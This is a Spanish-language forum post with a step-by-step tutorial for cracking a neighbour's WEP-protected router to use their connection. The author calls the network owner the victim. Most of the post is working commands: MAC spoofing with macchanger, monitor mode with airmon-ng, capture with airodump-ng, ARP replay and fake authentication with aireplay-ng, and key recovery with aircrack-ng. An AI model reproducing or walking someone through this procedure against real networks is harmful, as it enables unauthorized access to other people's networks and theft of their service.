Hace ratos mi vecino me estaba tentando con su conexion de 2 mb, que mi laptop alcanzaba. entonces puse manos a la obra y me re-busque en comprar la tarjeta wireless Bus (Netgear WG11T) con chip Atheros AR5001 que es el ideal para lo que les explica este tuto que me encontre y porsupuesto el Live CD tipo Linux Backtrack 3 , (esta el Bactrack 4 pero dicen que no furula).
Ócupe todo lo mencionado en una laptop con entrada a trajeta PC Bus y no tarde mas de 10 minutos y ya tenia la clave wep. Además solo lo he realizado con Redes TURBONET.
Esta es la tarjeta que ocupe:
El Bactrack 3 lo baje de un post de taringa hace tiempo y no creo que tengan problema en encontralo e incluso hay versiones para USB.
asi se ve:
Recomendaciones:- Tener por lo menos 2 barras de señal con la red inalambrica que se atacara.
Acá el Tutorial:En este pequeño tuto les mostrare como crackear la clave WEP de los Routers!!
En este tuto yo utilizo:
Atheros AR5001 + Wireless Network Adapter (tarjeta de red)
Back Track 3
Weno, primero abrimos una shell, y escribimos:
airmon-ng stop ath0
(esto es como para detener la tarjeta de red ath0)
Despues escribimos:
macchanger -m 11:22:33:44:55:66 wifi0
(esto es para cambiar nuesta direccion mac)
Despues ponemos
airmon-ng start wifi0
(esto es para activar nuestra tarjeta en modo monitor)
Para saber que todo ha ido bien ponemos
iwconfig
(en esta pantallita podemos ver que esta en modo monitor y ver que cambiamos la direccion mac)
Despues buscamos las redes que hay al alcance
airodump-ng ath0
Aqui debemos apuntar en una hojita lo siguiente:
BSSID (xx:xx:xx:xx:xx:xx)
CH (en este caso es 5)
ESSID (Nombre de la RED)
ya que tengamos estos datos, apretamos (control+C) y vremos que se detendra la pantalla anterior..
Despues ponemos..
airodump-ng --channel x --write xxx ath0
x= canal, como en el paso anterio el 5 pues quedaria asi (--channel 5)
xxx= nombre, aqui pueden ponel elnombre que quieran, pero acuerdense de lo que ponen, y en mi caso quedaria asi (--write pass)
airodump-ng --channel 5 --write pass ath0 (hasta aqui vamos bien?)
(aqui tendremos una pantallita similar a la anterior)
Ahora abrimos otra shell...
y en ella ponemos:
aireplay-ng -3 -b (mac de la victima) -h (nuestra mac) ath0
y pues quedaria mas o menos asi;
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66
(esto es para empezar a capturar datos ARP)
Ahora abrimos otra shell y escribimos:
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0
a mi me quedaria asi:
aireplay-ng -1 0 ESSID -a xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 ath0
y veremos que los ARP empiezan a subir de volada....
hasta este paso debemos de tener dos shell's abrietas
Ahora podemos ver que despues de 10 minutos ya tenemos 62160 ARP, con eso es mas que suficiente, ahora a las dos shell's las cancelamos, en cada una apretamos (control+C). con 50000 bastara.
Ya estamos en lo ultimo, ahora abrimos otra shell y escribimos:
aircrack-ng xx-01.cap
xx= el nombre que les dije que se acordaran, en mi caso es (pass)
aircrack-ng pass-01.cap
Como la red que nosotros elegimos es la opcion 1 pues ponemos el 1 y damos enter..
Y listo ya tenemos la Key Found xx:xx:xx:xx:xx
esa la debemos poner pero sin los dos puntos asi: (xxxxxxxxxx)
y listo!!! ya podemos navegar en internet...
Espero que les haya servido.
FUENTE:
http://foro.portalhacker.net/index.php/topic,70867.0.htmlTambien pueden buscar en youtube video tutoriales para trabajar con otras tarjetas o con la misma.
